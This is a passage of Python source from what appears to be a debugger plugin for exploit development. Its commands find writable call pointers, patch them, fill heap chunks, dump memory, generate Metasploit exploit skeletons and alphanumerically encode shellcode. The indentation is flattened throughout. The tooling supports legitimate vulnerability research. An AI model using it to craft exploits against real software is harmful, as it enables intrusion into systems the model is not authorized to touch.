orderedstats.sort(reverse=True)
for thissize in orderedstats:
nrblocks = globalstats[thissize]
percentage = (float(nrblocks) / float(allalloc)) * 100
tolog = " Size : 0x%x (%d) : %d chunks (%.2f %%)" % (thissize,thissize,nrblocks,percentage)
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
tolog = " Total chunks : %d" % allalloc
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
#dbg.log("%s" % "*" * 90)
return
def procGetIAT(args):
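    """
    Show the IAT entries of the selected module(s), optionally filtered on keywords (wrapper around procGetxAT)
    """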
return procGetxAT(args,"iat")
def procGetEAT(args):
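    """
    Show the EAT entries of the selected module(s), optionally filtered on keywords (wrapper around procGetxAT)
    """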
return procGetxAT(args,"eat")
def procFwptr(args):
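    """
    Find writeable pointers that get called (CALL/JMP [addr]) in the .text/.code sections of the
    selected modules, optionally filtering on heap chunk size (-chunksize), setting breakpoints (-bp)
    or patching the call targets with 0x41414141 (-patch). Results are written to wptr.txt
    """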
modulecriteria = {}
criteria = {}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
modulestosearch = getModulesToQuery(modulecriteria)
allpages = dbg.getMemoryPages()
orderedpages = []
for page in allpages.keys():
orderedpages.append(page)
orderedpages.sort()
pagestoquery = {}
fwptrs = {}
objwptr = MnLog("wptr.txt")
wptrfile = objwptr.reset()
setbps = False
dopatch = False
dofreelist = False
if "bp" in args:
setbps = True
if "patch" in args:
dopatch = True
if "freelist" in args:
dofreelist = True
chunksize = 0
offset = 0
if "chunksize" in args:
if type(args["chunksize"]).__name__.lower() != "bool":
try:
if str(args["chunksize"]).lower().startswith("0x"):
chunksize = int(args["chunksize"],16)
else:
chunksize = int(args["chunksize"])
except:
chunksize = 0
if chunksize == 0 or chunksize > 0xffff:
dbg.log("[!] Invalid chunksize specified")
if chunksize > 0xffff:
dbg.log("[!] Chunksize must be <= 0xffff")
                chunksize = 0
return
else:
dbg.log("[+] Will filter on chunksize 0x%0x" % chunksize )
if dofreelist:
if "offset" in args:
if type(args["offset"]).__name__.lower() != "bool":
try:
if str(args["offset"]).lower().startswith("0x"):
offset = int(args["offset"],16)
else:
offset = int(args["offset"])
except:
offset = 0
if offset == 0:
dbg.log("[!] Invalid offset specified")
else:
dbg.log("[+] Will add 0x%0x bytes between flink/blink and fwptr" % offset )
if not silent:
if setbps:
dbg.log("[+] Will set breakpoints on found CALL/JMP")
if dopatch:
dbg.log("[+] Will patch target for CALL/JMP with 0x41414141")
dbg.log("[+] Extracting .text/.code sections from %d modules" % len(modulestosearch))
dbg.updateLog()
if len(modulestosearch) > 0:
for thismodule in modulestosearch:
# find text section
for thispage in orderedpages:
page = allpages[thispage]
pagestart = page.getBaseAddress()
pagesize = page.getSize()
ptr = MnPointer(pagestart)
mod = ""
sectionname = ""
try:
mod = ptr.belongsTo()
if mod == thismodule:
sectionname = page.getSection()
if sectionname == ".text" or sectionname == ".code":
pagestoquery[mod] = [pagestart,pagestart+pagesize]
break
except:
pass
if len(pagestoquery) > 0:
if not silent:
dbg.log("[+] Analysing .text/.code sections")
dbg.updateLog()
for modname in pagestoquery:
tmodcnt = 0
nr_sizematch = 0
pagestart = pagestoquery[modname][0]
pageend = pagestoquery[modname][1]
if not silent:
dbg.log(" - Carving through %s (0x%08x - 0x%08x)" % (modname,pagestart,pageend))
dbg.updateLog()
loc = pagestart
while loc < pageend:
try:
thisinstr = dbg.disasm(loc)
instrbytes = thisinstr.getDump()
if thisinstr.isJmp() or thisinstr.isCall():
# check if it's reading a pointer from somewhere
instrtext = getDisasmInstruction(thisinstr)
opcodepart = instrbytes.upper()[0:4]
if opcodepart == "FF15" or opcodepart == "FF25":
if "[" in instrtext and "]" in instrtext:
parts1 = instrtext.split("[")
if len(parts1) > 1:
parts2 = parts1[1].split("]")
addy = parts2[0]
# get the actual value and check if it's writeable
if "(" in addy and ")" in addy:
parts1 = addy.split("(")
parts2 = parts1[1].split(")")
addy = parts2[0]
if isHexValue(addy):
addyval = hexStrToInt(addy)
access = getPointerAccess(addyval)
if "WRITE" in access:
if meetsCriteria(addyval,criteria):
savetolog = False
sizeinfo = ""
if chunksize == 0:
savetolog = True
else:
                                                # check if this location could act as a heap chunk of a certain size
                                                # the size field would be located 8 bytes before the current location
                                                # and is 2 bytes wide
sizeval = 0
if not dofreelist:
sizeval = struct.unpack('<H',dbg.readMemory(addyval-8,2))[0]
if sizeval >= chunksize:
savetolog = True
nr_sizematch += 1
sizeinfo = " Chunksize: %d (0x%02x) - " % ((sizeval*8),(sizeval*8))
else:
sizeval = struct.unpack('<H',dbg.readMemory(addyval-8-offset,2))[0]
#
flink = struct.unpack('<L',dbg.readMemory(addyval-offset,4))[0]
blink = struct.unpack('<L',dbg.readMemory(addyval+4-offset,4))[0]
aflink = getPointerAccess(flink)
ablink = getPointerAccess(blink)
if "READ" in aflink and "READ" in ablink:
extr = ""
if sizeval == chunksize or sizeval == chunksize + 1:
extr = " **size match**"
nr_sizematch += 1
sizeinfo = " Chunksize: %d (0x%02x)%s, UserPtr 0x%08x, Flink 0x%08x, Blink 0x%08x - " % ((sizeval*8),(sizeval*8),extr,addyval-offset,flink,blink)
savetolog = True
if savetolog:
fwptrs[loc] = addyval
tmodcnt += 1
ptrx = MnPointer(addyval)
mod = ptrx.belongsTo()
tofile = "0x%08x : 0x%08x gets called from %s at 0x%08x (%s) - %s%s" % (addyval,addyval,mod,loc,instrtext,sizeinfo,ptrx.__str__())
objwptr.write(tofile,wptrfile)
if setbps:
dbg.setBreakpoint(loc)
if dopatch:
dbg.writeLong(addyval,0x41414141)
if len(instrbytes) > 0:
loc = loc + len(instrbytes)/2
else:
loc = loc + 1
except:
loc = loc + 1
if not silent:
dbg.log(" Found %d pointers" % tmodcnt)
if chunksize > 0:
dbg.log(" %d pointers with size match" % nr_sizematch)
return
def procGetxAT(args,mode):
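    """
    Search the IAT or EAT (depending on 'mode') of the selected modules, optionally filtered
    on comma-separated keywords (-s), and write the results to <mode>search.txt
    """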
keywords = []
keywordstring = ""
modulecriteria = {}
criteria = {}
thisxat = {}
entriesfound = 0
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
keywordstring = args["s"].replace("'","").replace('"','')
keywords = keywordstring.split(",")
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
modulestosearch = getModulesToQuery(modulecriteria)
if not silent:
dbg.log("[+] Querying %d modules" % len(modulestosearch))
if len(modulestosearch) > 0:
xatfilename="%ssearch.txt" % mode
objxatfilename = MnLog(xatfilename)
xatfile = objxatfilename.reset()
for thismodule in modulestosearch:
thismod = MnModule(thismodule)
if mode == "iat":
thisxat = thismod.getIAT()
else:
thisxat = thismod.getEAT()
thismodule = thismod.getShortName()
for thisfunc in thisxat:
thisfuncname = thisxat[thisfunc].lower()
origfuncname = thisfuncname
firstindex = thisfuncname.find(".")
if firstindex > 0:
thisfuncname = thisfuncname[firstindex+1:len(thisfuncname)]
addtolist = False
iatptr_modname = ""
modinfohr = ""
theptr = 0
if mode == "iat":
theptr = struct.unpack('<L',dbg.readMemory(thisfunc,4))[0]
ptrx = MnPointer(theptr)
iatptr_modname = ptrx.belongsTo()
if not iatptr_modname == "" and "." in iatptr_modname:
iatptr_modparts = iatptr_modname.split(".")
iatptr_modname = iatptr_modparts[0]
if not "." in origfuncname and iatptr_modname != "" and not "!" in origfuncname:
origfuncname = iatptr_modname.lower() + "." + origfuncname
thisfuncname = origfuncname
if "!" in origfuncname:
oparts = origfuncname.split("!")
origfuncname = iatptr_modname + "." + oparts[1]
thisfuncname = origfuncname
try:
ModObj = MnModule(iatptr_modname)
modinfohr = " - %s" % (ModObj.__str__())
except:
modinfohr = ""
pass
if len(keywords) > 0:
for keyword in keywords:
keyword = keyword.lower().strip()
if ((keyword.startswith("*") and keyword.endswith("*")) or keyword.find("*") < 0):
keyword = keyword.replace("*","")
if thisfuncname.find(keyword) > -1:
addtolist = True
break
if keyword.startswith("*") and not keyword.endswith("*"):
keyword = keyword.replace("*","")
if thisfuncname.endswith(keyword):
addtolist = True
break
if keyword.endswith("*") and not keyword.startswith("*"):
keyword = keyword.replace("*","")
if thisfuncname.startswith(keyword):
addtolist = True
break
else:
addtolist = True
if addtolist:
entriesfound += 1
# add info about the module
if mode == "iat":
thedelta = thisfunc - thismod.moduleBase
logentry = "At 0x%s in %s (base + 0x%s) : 0x%s (ptr to %s) %s" % (toHex(thisfunc),thismodule.lower(),toHex(thedelta),toHex(theptr),origfuncname,modinfohr)
else:
thedelta = thisfunc - thismod.moduleBase
logentry = "0x%08x : %s!%s (0x%08x+0x%08x)" % (thisfunc,thismodule.lower(),origfuncname,thismod.moduleBase,thedelta)
dbg.log(logentry,address = thisfunc)
objxatfilename.write(logentry,xatfile)
if not silent:
dbg.log("")
dbg.log("%d entries found" % entriesfound)
return
#-----Metasploit module skeleton-----#
def procSkeleton(args):
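    """
    Write a Metasploit exploit module skeleton (msfskeleton.rb) for a tcp client, udp client
    or fileformat exploit, using a cyclic pattern of -c bytes as initial buffer
    """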
cyclicsize = 5000
if "c" in args:
if type(args["c"]).__name__.lower() != "bool":
try:
cyclicsize = int(args["c"])
except:
cyclicsize = 5000
exploittype = ""
skeletonarg = ""
usecliargs = False
validstypes ={}
validstypes["tcpclient"] = "network client (tcp)"
validstypes["udpclient"] = "network client (udp)"
validstypes["fileformat"] = "fileformat"
exploittypes = [ "fileformat","network client (tcp)","network client (udp)" ]
errorfound = False
if __DEBUGGERAPP__ == "WinDBG" or __DEBUGGERAPP__ == 'x64dbg' or "t" in args:
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
skeltype = args["t"].lower()
skelparts = skeltype.split(":")
if skelparts[0] in validstypes:
exploittype = validstypes[skelparts[0]]
if len(skelparts) > 1:
skeletonarg = skelparts[1]
else:
errorfound = True
usecliargs = True
else:
errorfound = True
else:
errorfound = True
else:
errorfound = True
# ask for type of module
else:
dbg.log(" ** Please select a skeleton exploit type from the dropdown list **",highlight=1)
exploittype = dbg.comboBox("Select msf exploit skeleton to build :", exploittypes).lower().strip()
if errorfound:
dbg.log(" ** Please specify a valid skeleton type and argument **",highlight=1)
dbg.log(" Valid types are : tcpclient:argument, udpclient:argument, fileformat:argument")
dbg.log(" Example : skeleton for a pdf file format exploit: -t fileformat:pdf")
dbg.log(" skeleton for tcp client against port 123: -t tcpclient:123")
return
if not exploittype in exploittypes:
dbg.log("Boo - invalid exploit type, try again !",highlight=1)
return
portnr = 0
extension = ""
if exploittype.find("network") > -1:
if usecliargs:
portnr = skeletonarg
else:
portnr = dbg.inputBox("Remote port number : ")
try:
portnr = int(portnr)
except:
portnr = 0
if exploittype.find("fileformat") > -1:
if usecliargs:
extension = skeletonarg
else:
extension = dbg.inputBox("File extension :")
extension = extension.replace("'","").replace('"',"").replace("\n","").replace("\r","")
if not extension.startswith("."):
extension = "." + extension
exploitfilename="msfskeleton.rb"
objexploitfile = MnLog(exploitfilename)
global ignoremodules
global noheader
noheader = True
ignoremodules = True
exploitfile = objexploitfile.reset()
ignoremodules = False
noheader = False
modulecriteria = {}
criteria = {}
modulecriteria,criteria = args2criteria(args,modulecriteria,criteria)
badchars = ""
if "badchars" in criteria:
badchars = criteria["badchars"]
if "nonull" in criteria:
if not '\x00' in badchars:
badchars += '\x00'
skeletonheader,skeletoninit,skeletoninit2 = getSkeletonHeader(exploittype,portnr,extension,"",badchars)
targetstr = " 'Targets' =>\n"
targetstr += " [\n"
targetstr += " [ '<fill in the OS/app version here>',\n"
targetstr += " {\n"
targetstr += " 'Ret' => 0x00000000,\n"
targetstr += " 'Offset' => 0\n"
targetstr += " }\n"
targetstr += " ],\n"
targetstr += " ],\n"
exploitstr = " def exploit\n\n"
if exploittype.find("network") > -1:
if exploittype.find("tcp") > -1:
exploitstr += "\n connect\n\n"
elif exploittype.find("udp") > -1:
exploitstr += "\n connect_udp\n\n"
exploitstr += " buffer = Rex::Text.pattern_create(" + str(cyclicsize) + ")\n"
if exploittype.find("network") > -1:
exploitstr += "\n print_status(\"Trying target #{target.name}...\")\n"
if exploittype.find("tcp") > -1:
exploitstr += " sock.put(buffer)\n"
exploitstr += "\n handler\n"
elif exploittype.find("udp") > -1:
exploitstr += " udp_sock.put(buffer)\n"
exploitstr += "\n handler(udp_sock)\n"
if exploittype == "fileformat":
exploitstr += "\n file_create(buffer)\n\n"
if exploittype.find("network") > -1:
exploitstr += " disconnect\n\n"
exploitstr += " end\n"
objexploitfile.write(skeletonheader+"\n",exploitfile)
objexploitfile.write(skeletoninit+"\n",exploitfile)
objexploitfile.write(targetstr,exploitfile)
objexploitfile.write(skeletoninit2,exploitfile)
objexploitfile.write(exploitstr,exploitfile)
objexploitfile.write("end",exploitfile)
return
def procFillChunk(args):
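    """
    Fill the heap chunk referenced by a register or dereference (-r) with a given byte (-b, default A),
    or fill -s bytes at that location if the address is not part of a heap chunk
    """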
reference = ""
fillchar = "A"
allregs = dbg.getRegs()
origreference = ""
deref = False
refreg = ""
offset = 0
signstuff = 1
customsize = 0
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
sizearg = args["s"]
if sizearg.lower().startswith("0x"):
sizearg = sizearg.lower().replace("0x","")
customsize = int(sizearg,16)
else:
customsize = int(sizearg)
if "r" in args:
if type(args["r"]).__name__.lower() != "bool":
# break into pieces
reference = args["r"].upper()
origreference = reference
if reference.find("[") > -1 and reference.find("]") > -1:
refregtmp = reference.replace("[","").replace("]","").replace(" ","")
if reference.find("+") > -1 or reference.find("-") > -1:
# deref with offset
refregtmpparts = []
if reference.find("+") > -1:
refregtmpparts = refregtmp.split("+")
signstuff = 1
if reference.find("-") > -1:
refregtmpparts = refregtmp.split("-")
signstuff = -1
if len(refregtmpparts) > 1:
offset = int(refregtmpparts[1].replace("0X",""),16) * signstuff
deref = True
refreg = refregtmpparts[0]
if not refreg in allregs:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
# only deref
refreg = refregtmp
deref = True
else:
# no deref, maybe offset
if reference.find("+") > -1 or reference.find("-") > -1:
# deref with offset
refregtmpparts = []
refregtmp = reference.replace(" ","")
if reference.find("+") > -1:
refregtmpparts = refregtmp.split("+")
signstuff = 1
if reference.find("-") > -1:
refregtmpparts = refregtmp.split("-")
signstuff = -1
if len(refregtmpparts) > 1:
offset = int(refregtmpparts[1].replace("0X",""),16) * signstuff
refreg = refregtmpparts[0]
if not refreg in allregs:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
# only deref
refregtmp = reference.replace(" ","")
refreg = refregtmp
deref = False
else:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
else:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
if not refreg in allregs:
dbg.log("** Please provide a valid reference using -r reg/reference **")
return
dbg.log("Ref : %s" % refreg)
dbg.log("Offset : %d (0x%s)" % (offset,toHex(int(str(offset).replace("-","")))))
dbg.log("Deref ? : %s" % deref)
if "b" in args:
if type(args["b"]).__name__.lower() != "bool":
if args["b"].find("\\x") > -1:
fillchar = hex2bin(args["b"])[0]
else:
fillchar = args["b"][0]
# see if we can read the reference
refvalue = 0
if deref:
refref = 0
try:
refref = allregs[refreg]+offset
except:
dbg.log("** Unable to read from %s (0x%08x)" % (origreference,allregs[refreg]+offset))
try:
refvalue = struct.unpack('<L',dbg.readMemory(refref,4))[0]
except:
            dbg.log("** Unable to read from %s (0x%08x) -> 0x%08x" % (origreference,allregs[refreg]+offset,refref))
return
else:
try:
refvalue = allregs[refreg]+offset
except:
dbg.log("** Unable to read from %s (0x%08x)" % (reference,allregs[refreg]+offset))
dbg.log("Reference : %s: 0x%08x" % (origreference,refvalue))
dbg.log("Fill char : \\x%s" % bin2hex(fillchar))
cmd2run = "!heap -p -a 0x%08x" % refvalue
output = dbg.nativeCommand(cmd2run)
outputlines = output.split("\n")
heapinfo = ""
for line in outputlines:
if line.find("[") > -1 and line.find("]") > -1 and line.find("(") > -1 and line.find(")") > -1:
heapinfo = line
break
if heapinfo == "":
dbg.log("Address is not part of a heap chunk")
if customsize > 0:
dbg.log("Filling memory location starting at 0x%08x with \\x%s" % (refvalue,bin2hex(fillchar)))
dbg.log("Number of bytes to write : %d (0x%08x)" % (customsize,customsize))
data = fillchar * customsize
dbg.writeMemory(refvalue,data)
dbg.log("Done")
else:
dbg.log("Please specify a custom size with -s to fill up the memory location anyway")
else:
infofields = []
cnt = 0
charseen = False
thisfield = ""
while cnt < len(heapinfo):
if heapinfo[cnt] == " " and charseen and thisfield != "":
infofields.append(thisfield)
thisfield = ""
else:
if not heapinfo[cnt] == " ":
thisfield += heapinfo[cnt]
charseen = True
cnt += 1
if thisfield != "":
infofields.append(thisfield)
if len(infofields) > 7:
chunkptr = hexStrToInt(infofields[0])
userptr = hexStrToInt(infofields[4])
size = hexStrToInt(infofields[5])
dbg.log("Heap chunk found at 0x%08x, size 0x%08x (%d) bytes" % (chunkptr,size,size))
dbg.log("Filling chunk with \\x%s, starting at 0x%08x" % (bin2hex(fillchar),userptr))
data = fillchar * size
dbg.writeMemory(userptr,data)
dbg.log("Done")
return
def procInfoDump(args):
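    """
    Dump the contents of all accessible memory pages that do not belong to a module, the stack
    or a heap (together with basic module info) to infodump.xml
    """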
allpages = dbg.getMemoryPages()
filename = "infodump.xml"
xmldata = '<info>\n'
xmldata += "<modules>\n"
populateModuleInfo()
modulestoquery=[]
for thismodule,modproperties in g_modules.iteritems():
xmldata += " <module name='%s'>\n" % thismodule
thisbase = getModuleProperty(thismodule,"base")
thissize = getModuleProperty(thismodule,"size")
xmldata += " <base>0x%08x</base>\n" % thisbase
xmldata += " <size>0x%08x</size>\n" % thissize
xmldata += " </module>\n"
xmldata += "</modules>\n"
orderedpages = []
for tpage in allpages.keys():
orderedpages.append(tpage)
orderedpages.sort()
if len(orderedpages) > 0:
xmldata += "<pages>\n"
# first dump module info to file
objfile = MnLog(filename)
infofile = objfile.reset(clear=True,showheader=False)
f = open(infofile,"wb")
for line in xmldata.split("\n"):
if line != "":
f.write(line + "\n")
tolog = "Dumping the following pages to file:"
dbg.log(tolog)
tolog = "Start End Size ACL"
dbg.log(tolog)
for thispage in orderedpages:
page = allpages[thispage]
pagestart = page.getBaseAddress()
pagesize = page.getSize()
ptr = MnPointer(pagestart)
mod = ""
sectionname = ""
ismod = False
isstack = False
isheap = False
try:
mod = ptr.belongsTo()
if mod != "":
ismod = True
except:
mod = ""
if not ismod:
if ptr.isOnStack():
isstack = True
if not ismod and not isstack:
if ptr.isInHeap():
isheap = True
if not ismod and not isstack and not isheap:
acl = page.getAccess(human=True)
if not "NOACCESS" in acl:
tolog = "0x%08x - 0x%08x (0x%08x) %s" % (pagestart,pagestart + pagesize,pagesize,acl)
dbg.log(tolog)
# add page contents to xml
thispage = dbg.readMemory(pagestart,pagesize)
f.write(" <page start=\"0x%08x\">\n" % pagestart)
f.write(" <size>0x%08x</size>\n" % pagesize)
f.write(" <acl>%s</acl>\n" % acl)
f.write(" <contents>")
memcontents = ""
for thisbyte in thispage:
memcontents += bin2hex(thisbyte)
f.write(memcontents)
f.write("</contents>\n")
f.write(" </page>\n")
f.write("</pages>\n")
f.write("</info>")
dbg.log("")
f.close()
dbg.log("Done")
return
def procPEB(args):
"""
Show the address of the PEB
"""
pebaddy = dbg.getPEBAddress()
dbg.log("PEB is located at 0x%08x" % pebaddy,address=pebaddy)
return
def procTEB(args):
"""
Show the address of the TEB for the current thread
"""
tebaddy = dbg.getCurrentTEBAddress()
dbg.log("TEB is located at 0x%08x" % tebaddy,address=tebaddy)
return
def procPageACL(args):
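    """
    List all memory pages and their access level (ACL), or only the pages surrounding a given
    address (-a), and write the output to pageacl.txt
    """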
global silent
silent = True
findaddy = 0
if "a" in args:
findaddy,addyok = getAddyArg(args["a"])
if not addyok:
dbg.log("%s is an invalid address" % args["a"], highlight=1)
return
if findaddy > 0:
dbg.log("Displaying page information around address 0x%08x" % findaddy)
allpages = dbg.getMemoryPages()
dbg.log("Total of %d pages : "% len(allpages))
filename="pageacl.txt"
orderedpages = []
for tpage in allpages.keys():
orderedpages.append(tpage)
orderedpages.sort()
# find indexes to show in case we have specified an address
toshow = []
previouspage = 0
nextpage = 0
pagefound = False
if findaddy > 0:
for thispage in orderedpages:
page = allpages[thispage]
pagestart = page.getBaseAddress()
pagesize = page.getSize()
pageend = pagestart + pagesize
if findaddy >= pagestart and findaddy < pageend:
toshow.append(thispage)
pagefound = True
if pagefound and previouspage > 0:
if not previouspage in toshow:
toshow.append(previouspage)
if not thispage in toshow:
toshow.append(thispage) # nextpage
break
previouspage = thispage
if len(toshow) > 0:
toshow.sort()
orderedpages = toshow
dbg.log("Showing %d pages" % len(orderedpages))
if len(orderedpages) > 0:
objfile = MnLog(filename)
aclfile = objfile.reset()
tolog = "Start End Size ACL"
dbg.log(tolog)
objfile.write(tolog,aclfile)
for thispage in orderedpages:
page = allpages[thispage]
pagestart = page.getBaseAddress()
pagesize = page.getSize()
ptr = MnPointer(pagestart)
mod = ""
sectionname = ""
try:
mod = ptr.belongsTo()
if not mod == "":
mod = "(" + mod + ")"
sectionname = page.getSection()
except:
#print traceback.format_exc()
pass
if mod == "":
if ptr.isOnStack():
mod = "(Stack)"
elif ptr.isInHeap():
mod = "(Heap)"
acl = page.getAccess(human=True)
tolog = "0x%08x - 0x%08x (0x%08x) %s %s %s" % (pagestart,pagestart + pagesize,pagesize,acl,mod, sectionname)
objfile.write(tolog,aclfile)
dbg.log(tolog)
silent = False
return
def procMacro(args):
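    """
    Manage mona macros stored in the knowledgebase : -add, -del, -list, -show,
    -set (edit the commands at a given index or attach a script file) and -run
    """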
validcommands = ["run","set","list","del","add","show"]
validcommandfound = False
selectedcommand = ""
for command in validcommands:
if command in args:
validcommandfound = True
selectedcommand = command
break
dbg.log("")
if not validcommandfound:
dbg.log("*** Please specify a valid command. Valid commands are :")
for command in validcommands:
dbg.log(" -%s" % command)
return
macroname = ""
if "set" in args:
if type(args["set"]).__name__.lower() != "bool":
macroname = args["set"]
if "show" in args:
if type(args["show"]).__name__.lower() != "bool":
macroname = args["show"]
if "add" in args:
if type(args["add"]).__name__.lower() != "bool":
macroname = args["add"]
if "del" in args:
if type(args["del"]).__name__.lower() != "bool":
macroname = args["del"]
if "run" in args:
if type(args["run"]).__name__.lower() != "bool":
macroname = args["run"]
filename = ""
index = -1
insert = False
iamsure = False
if "index" in args:
if type(args["index"]).__name__.lower() != "bool":
index = int(args["index"])
if index < 0:
dbg.log("** Please use a positive integer as index",highlight=1)
if "file" in args:
if type(args["file"]).__name__.lower() != "bool":
filename = args["file"]
if filename != "" and index > -1:
dbg.log("** Please either provide an index or a filename, not both",highlight=1)
return
if "insert" in args:
insert = True
if "iamsure" in args:
iamsure = True
argcommand = ""
if "cmd" in args:
if type(args["cmd"]).__name__.lower() != "bool":
argcommand = args["cmd"]
dbg.setKBDB("monamacro.db")
macros = dbg.getKnowledge("macro")
if macros is None:
macros = {}
if selectedcommand == "list":
for macro in macros:
thismacro = macros[macro]
macronametxt = "Macro : '%s' : %d command(s)" % (macro,len(thismacro))
dbg.log(macronametxt)
dbg.log("")
dbg.log("Number of macros : %d" % len(macros))
if selectedcommand == "show":
if macroname != "":
if not macroname in macros:
dbg.log("** Macro %s does not exist !" % macroname)
return
else:
macro = macros[macroname]
macronametxt = "Macro : %s" % macroname
macroline = "-" * len(macronametxt)
dbg.log(macronametxt)
dbg.log(macroline)
thismacro = macro
macrolist = []
for macroid in thismacro:
macrolist.append(macroid)
macrolist.sort()
nr_of_commands = 0
for macroid in macrolist:
macrocmd = thismacro[macroid]
if macrocmd.startswith("#"):
dbg.log(" [%04d] File:%s" % (macroid,macrocmd[1:]))
else:
dbg.log(" [%04d] %s" % (macroid,macrocmd))
nr_of_commands += 1
dbg.log("")
dbg.log("Nr of commands in this macro : %d" % nr_of_commands)
else:
dbg.log("** Please specify the macroname to show !",highlight=1)
return
if selectedcommand == "run":
if macroname != "":
if not macroname in macros:
dbg.log("** Macro %s does not exist !" % macroname)
return
else:
macro = macros[macroname]
macronametxt = "Running macro : %s" % macroname
macroline = "-" * len(macronametxt)
dbg.log(macronametxt)
dbg.log(macroline)
thismacro = macro
macrolist = []
for macroid in thismacro:
macrolist.append(macroid)
macrolist.sort()
for macroid in macrolist:
macrocmd = thismacro[macroid]
if macrocmd.startswith("#"):
dbg.log("Executing script %s" % macrocmd[1:])
output = dbg.nativeCommand("$<%s" % macrocmd[1:])
dbg.logLines(output)
dbg.log("-" * 40)
else:
dbg.log("Index %d : %s" % (macroid,macrocmd))
dbg.log("")
output = dbg.nativeCommand(macrocmd)
dbg.logLines(output)
dbg.log("-" * 40)
dbg.log("")
dbg.log("[+] Done.")
else:
dbg.log("** Please specify the macroname to run !",highlight=1)
return
if selectedcommand == "set":
if macroname != "":
if not macroname in macros:
dbg.log("** Macro %s does not exist !" % macroname)
return
if argcommand == "" and filename == "":
dbg.log("** Please enter a valid command with parameter -cmd",highlight=1)
return
thismacro = macros[macroname]
if index == -1:
for i in thismacro:
thiscmd = thismacro[i]
if thiscmd.startswith("#"):
dbg.log("** You cannot edit a macro that uses a scriptfile.",highlight=1)
dbg.log(" Edit file %s instead" % thiscmd[1:],highlight=1)
return
if filename == "":
# append to end of the list
# find the next index first
nextindex = 0
for macindex in thismacro:
if macindex >= nextindex:
nextindex = macindex+1
if thismacro.__class__.__name__ == "dict":
thismacro[nextindex] = argcommand
else:
thismacro = {}
thismacro[nextindex] = argcommand
else:
thismacro = {}
nextindex = 0
thismacro[0] = "#%s" % filename
macros[macroname] = thismacro
dbg.addKnowledge("macro",macros)
dbg.log("[+] Done, saved new command at index %d." % nextindex)
else:
# user has specified an index
if index in thismacro:
if argcommand == "#":
# remove command at this index
del thismacro[index]
else:
# if macro already contains a file entry, bail out
for i in thismacro:
thiscmd = thismacro[i]
if thiscmd.startswith("#"):
dbg.log("** You cannot edit a macro that uses a scriptfile.",highlight=1)
dbg.log(" Edit file %s instead" % thiscmd[1:],highlight=1)
return
# index exists - overwrite unless -insert was provided too
# remove or insert ?
#print sys.argv
if not insert:
thismacro[index] = argcommand
else:
# move things around
# get ordered list of existing indexes
indexes = []
for macindex in thismacro:
indexes.append(macindex)
indexes.sort()
thismacro2 = {}
cmdadded = False
for i in indexes:
if i < index:
thismacro2[i] = thismacro[i]
elif i == index:
thismacro2[i] = argcommand
thismacro2[i+1] = thismacro[i]
elif i > index:
thismacro2[i+1] = thismacro[i]
thismacro = thismacro2
else:
# index does not exist, add new command to this index
for i in thismacro:
thiscmd = thismacro[i]
if thiscmd.startswith("#"):
dbg.log("** You cannot edit a macro that uses a scriptfile.",highlight=1)
dbg.log(" Edit file %s instead" % thiscmd[1:],highlight=1)
return
if argcommand != "#":
thismacro[index] = argcommand
else:
dbg.log("** Index %d does not exist, unable to remove the command at that position" % index,highlight=1)
macros[macroname] = thismacro
dbg.addKnowledge("macro",macros)
if argcommand != "#":
dbg.log("[+] Done, saved new command at index %d." % index)
else:
dbg.log("[+] Done, removed command at index %d." % index)
else:
dbg.log("** Please specify the macroname to edit !",highlight=1)
return
if selectedcommand == "add":
if macroname != "":
if macroname in macros:
dbg.log("** Macro '%s' already exists !" % macroname,highlight=1)
return
else:
macros[macroname] = {}
dbg.log("[+] Adding macro '%s'" % macroname)
dbg.addKnowledge("macro",macros)
dbg.log("[+] Done.")
else:
dbg.log("** Please specify the macroname to add !",highlight=1)
return
if selectedcommand == "del":
if not macroname in macros:
dbg.log("** Macro '%s' doesn't exist !" % macroname,highlight=1)
else:
if not iamsure:
dbg.log("** To delete macro '%s', please add the -iamsure flag to the command" % macroname)
return
else:
dbg.forgetKnowledge("macro",macroname)
dbg.log("[+] Done, deleted macro '%s'" % macroname)
return
def procEnc(args):
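    """
    Encode a series of bytes (-s) or the contents of a file (-f) with the selected encoder (-t),
    avoiding the bad chars specified with -cpb
    """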
validencoders = ['alphanum']
encodertyperror = True
byteerror = True
encodertype = ""
bytestoencodestr = ""
bytestoencode = ""
badbytes = ""
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
encodertype = args["t"]
encodertyperror = False
if "s" in args:
if type(args["s"]).__name__.lower() != "bool":
bytestoencodestr = args["s"]
byteerror = False
if "f" in args:
if type(args["f"]).__name__.lower() != "bool":
binfile = args["f"]
if os.path.exists(binfile):
if not silent:
dbg.log("[+] Reading bytes from %s" % binfile)
try:
f = open(binfile,"rb")
content = f.readlines()
f.close()
for c in content:
for a in c:
bytestoencodestr += "\\x%02x" % ord(a)
byteerror = False
except:
dbg.log("*** Error - unable to read bytes from %s" % binfile)
dbg.logLines(traceback.format_exc(),highlight=True)
byteerror = True
else:
byteerror = True
else:
byteerror = True
if "cpb" in args:
if type(args["cpb"]).__name__.lower() != "bool":
badbytes = hex2bin(args["cpb"])
if not encodertype in validencoders:
encodertyperror = True
if bytestoencodestr == "":
byteerror = True
else:
bytestoencode = hex2bin(bytestoencodestr)
if encodertyperror:
dbg.log("*** Please specific a valid encodertype with parameter -t.",highlight=True)
dbg.log("*** Valid types are: %s" % validencoders,highlight=True)
if byteerror:
dbg.log("*** Please specify a valid series of bytes with parameter -s",highlight=True)
dbg.log("*** or specify a valid path with parameter -f",highlight=True)
if encodertyperror or byteerror:
return
else:
cEncoder = MnEncoder(bytestoencode)
encodedbytes = ""
if encodertype == "alphanum":
encodedbytes = cEncoder.encodeAlphaNum(badchars = badbytes)
# determine correct sequence of dictionary
if len(encodedbytes) > 0:
logfile = MnLog("encoded_%s.txt" % encodertype)
thislog = logfile.reset()
if not silent:
dbg.log("")
dbg.log("Results:")
dbg.log("--------")
